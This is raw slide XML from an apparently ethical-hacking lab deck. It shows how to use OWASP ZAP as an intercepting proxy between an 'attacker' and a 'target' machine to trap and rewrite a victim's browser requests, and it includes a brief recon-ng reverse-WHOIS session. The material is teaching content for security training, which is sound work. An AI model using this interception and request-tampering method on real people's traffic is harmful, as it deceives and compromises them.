              <a:rPr lang="en" sz="2200"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>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230"/>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b" anchorCtr="0">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="38100" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="E7E9C9"/>
              </a:buClr>
              <a:buSzPct val="116666"/>
              <a:buFont typeface="Rockwell"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1608" name="Google Shape;1608;p230"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385780" y="1234450"/>
            <a:ext cx="8419500" cy="2263500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-374650" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2300"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t>Once the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300" b="1"/>
              <a:t>Break tab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t> is added, you need to configure the ZAP to work as a proxy, go to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300" b="1"/>
              <a:t>Options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t> by click on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300" b="1"/>
              <a:t>gear icon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t> on the top, as show below:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2300"/>
            </a:br>
            <a:endParaRPr sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-374650" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2300"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t>On the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300" b="1"/>
              <a:t>Options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t> window, select the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300" b="1"/>
              <a:t>Local Proxies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t> from the left pane; The address is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300" b="1"/>
              <a:t>Windows Server IP address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t> and port is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300" b="1"/>
              <a:t>8080</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t> by default.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2300"/>
            </a:br>
            <a:endParaRPr sz="2300"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="just" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t>Go back to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300" b="1"/>
              <a:t>ZAP main window</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t> and click on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300" b="1"/>
              <a:t>Green Button (Set break on all requests and responses)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2300"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2400"/>
            </a:br>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>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231"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="1645920"/>
            <a:ext cx="8115300" cy="3018000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>This button sets and unsets a global break point that will trap and display the next response or request in Break tab from the Target's machine.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2400"/>
            </a:br>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>You can modify any part of the request or response that you want and send it to the victim's application by clicking either </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400" b="1"/>
              <a:t>Step</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400" b="1"/>
              <a:t>Continue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2400"/>
            </a:br>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Alternatively, you can click </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400" b="1"/>
              <a:t>Drop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t> to dispose of the request or response.</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232"/>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b" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="38100" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="E7E9C9"/>
              </a:buClr>
              <a:buSzPts val="3500"/>
              <a:buFont typeface="Rockwell"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1619" name="Google Shape;1619;p232" descr="C:\Users\Dell\Downloads\zap-5.png"/>
          <p:cNvPicPr preferRelativeResize="0">
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1064795" y="794085"/>
            <a:ext cx="6632400" cy="3989100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1620" name="Google Shape;1620;p232"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6179261" y="17145"/>
            <a:ext cx="2947593" cy="623932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solid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233"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385780" y="1234450"/>
            <a:ext cx="8482500" cy="2263500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="215900" lvl="0" indent="-266700" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1"/>
              <a:t>Switch back to the target machine(Windows 10)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> and launch the same browser in which you have configured the proxy settings.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800"/>
            </a:br>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="215900" lvl="0" indent="-266700" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Type the URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.certifiedhacker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> , in case you got any warning messages just accept the risk and continue.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800"/>
            </a:br>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="215900" lvl="0" indent="-266700" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Now, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1"/>
              <a:t>switch to the attacker machine(Windows Server)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>, you will notice that the ZAP proxy is started capturing the requests of the target.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800"/>
            </a:br>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="215900" lvl="0" indent="-266700" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Now click the button </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1"/>
              <a:t>'submit and step to the next request'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> until you capture the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1"/>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> request of the browsed website.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1800"/>
            </a:br>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="215900" lvl="0" indent="-266700" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>You can modify all GET requests captured on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1"/>
              <a:t>Break tab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> and forward the traffic to the target machine, changing the website and so on.</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="215900" lvl="0" indent="-152400" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>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234"/>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b" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="38100" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="E7E9C9"/>
              </a:buClr>
              <a:buSzPts val="3500"/>
              <a:buFont typeface="Rockwell"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1631" name="Google Shape;1631;p234" descr="C:\Users\Dell\Downloads\zap-9.png"/>
          <p:cNvPicPr preferRelativeResize="0">
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="881110" y="641077"/>
            <a:ext cx="6641400" cy="4069500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1632" name="Google Shape;1632;p234"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6179261" y="17145"/>
            <a:ext cx="2947593" cy="623932"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solid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56" y="955497"/>
            <a:ext cx="8661115" cy="4052868"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503433" y="297950"/>
            <a:ext cx="7895110" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Now we will see how to change a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>wesbite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> , go to your browser and search for whatever you want </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>I searched cake here as you can see , now we will capture this request in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>owasp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ZAP </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19639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4"/>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2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="342" name="Google Shape;342;p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1111250"/>
            <a:ext cx="87312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root@kali:~# recon-ng</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                      [recon-ng v4.9.4, Tim Tomes (@LaNMaSteR53)]</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[76] Recon modules</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[8]  Reporting modules</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[2]  Import modules</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[2]  Exploitation modules</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[2]  Discovery modules</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r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1A1A1A"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[recon-ng][default]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1A1A1A"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> &gt; workspaces</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[recon-ng][default]&gt; workspaces create jain</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[recon-ng][jain] &gt; marketplace search</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[recon-ng][jain] &gt; marketplace install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="273239"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>recon/companies-domains/viewdns_reverse_whois.</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:srgbClr val="273239"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>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[recon-ng][jain] &gt;modules load </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="273239"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>recon/companies-domains/viewdns_reverse_whois</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:srgbClr val="273239"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>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[recon-ng][jain][</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="273239"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>viewdns_reverse_whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1A1A1A"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>] &gt;options set source google.com</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a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1A1A1A"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>[recon-ng][jain][</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="273239"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>viewdns_reverse_whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1A1A1A"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>]&gt;run</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 </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062" y="1109609"/>
            <a:ext cx="8352891" cy="3818428"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="667820" y="482885"/>
            <a:ext cx="7536037" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Search for cake in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>owasp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ZAP by forwarding the request , once u got that as shown in figure </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>hange that to whatever website you want victim to see  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="66890481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418" y="1099335"/>
            <a:ext cx="8291245" cy="3828702"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="482885" y="462337"/>
            <a:ext cx="6529352" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Here we are changing cake to car as shown in figure then forwarding the request</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37768213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31" y="1304817"/>
            <a:ext cx="8815227" cy="3713821"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="369870" y="441789"/>
            <a:ext cx="5161991" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>After this victim will see the browser which we want him to see  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="353201191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Google Shape;1637;p235"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="190150"/>
            <a:ext cx="3172800" cy="549900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="38100" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
